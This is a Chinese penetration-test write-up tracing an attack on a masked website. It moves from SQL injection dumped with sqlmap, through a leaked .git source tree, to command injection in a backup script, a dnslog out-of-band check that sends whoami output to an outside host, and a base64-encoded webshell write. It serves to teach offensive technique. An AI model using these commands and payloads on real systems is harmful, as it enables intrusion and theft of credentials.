文章来源：安译Sec

0x00 前言

曾经搞站最经典的套路就是：注入拿到密码进后台，上传shell然后内核提权。但是实际环境中，往往会有注入后密码解不开、找不到后台等情况，所以现在有的师傅说sql注入还不如xss。

0x01 详细步骤

一.网站界面就不放了，打码太累了，直接跳到随意点点后发现可疑参数，并确定存在漏洞的截图。

and 1=1页面显示正常，and 1=0页面变空白确定存在数字型注入，order by确定共4列，最后用select 1,2,3,4确定第2列回显。

二.之前探测发现没有waf，那就直接sqlmap一把梭。

跑当前库名：python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db跑所有数据库名：python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs标绿色的为当前数据库:xxx_history

三. 跑当前数据库表名。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --table

标绿色的表为我认为是存放管理员数据的表：

四.直接拖管理表的数据。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump

居然是明文密码，现在明文密码很少见了，不过考虑到目标网站有点历史悠久，也能理解。

五.虽然获得了管理员密码，但是找不到后台，常用的/admin、/login、/manage都试了。

六.用脚本扫目录，字典用的是御剑的标准字典。得到以下敏感目录(截图不全)。

七.git目录存在即git源码泄露漏洞，用GitHack脚本恢复了整站源码，一大坨，截图就不放了，放个数字你们感受下。

python2 GitHack.py https://www.马赛克.com/.git/

八.根据名字确定其中疑似后台的目录：

九.访问试试，/admin1已经404了，因为git中留存的是历史代码，所以目录被改名或删除都有可能。

十./7mysql7需要输入密码，试了不是之前注出的密码。

十一.xxxquestions目录下的wp-admin倒是可以进，但是也不是之前注出的密码。

十二.之前看到还有个xxx_questions数据库，再用sqlmap去跑一下试试：

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump

十三.这种加密是wordpress特有的加密，cmd5有针对该框架的解密，但是这个密码似乎太复杂，解不出。

十四.至此sql注入后有密码找不到后台、有后台解不开密码的情况就都碰到了。渗透似乎陷入僵局，没关系，手里的源码还有利用价值，拖到D盾里自动审计一下。

十五.访问那个级别5的已知后门，原来已经被人日过了，是个黑页：hacked by XXX。这个网站比较有历史了，可能这个黑页也是很多年前的某个娱乐圈黑客搞的。

十六.访问级别4的shell_exec后门，是个空白页面，查看手中的源代码，发现是一个备份脚本，有可能是同行留的，也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。

十七.脚本逻辑：接收了POST的filename参数，然后执行打包备份，但是参数传进shell_exec之前没有做过滤，产生了命令执行的漏洞。用linux的命令连接符分号，可以在后面拼接任意命令，这里尝试一下执行whoami，但是还是空白页面。

十八.想到是因为shell_exec函数没有回显，也不知道命令执行成功没有，这里我们用公开免费的dnslog平台去接收没有回显的注入：

http://www.dnslog.cn/，用法如下：

先点击Get SubDomain在平台获取一个域名

十九.然后执行ping命令，反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里，linux系统使用ping命令要加-c指定次数，不然会一直ping个没完。

二十.去平台点击Refresh Record刷新(不要刷新整个网页)，获取到解析日志。

可以看到命令是执行成功了的。whoami的回显为www-data

二十一.确认了漏洞存在，接下来利用漏洞写一句话，注意因为一句话中包含特殊字符，要编码后写入，payload如下

echo base64编码后的一句话|base64 -d > shell.php

(实战中不要用这个文件名，有授权的测试随便，但要注意文件名对waf来说也是一种特征)

二十二.写马成功

二十三.客户没有授权内网，项目结束。

推荐文章++++

*SQLiScanner-SQL注入扩展扫描工具

*Django GIS SQL注入漏洞

*SQL注入类型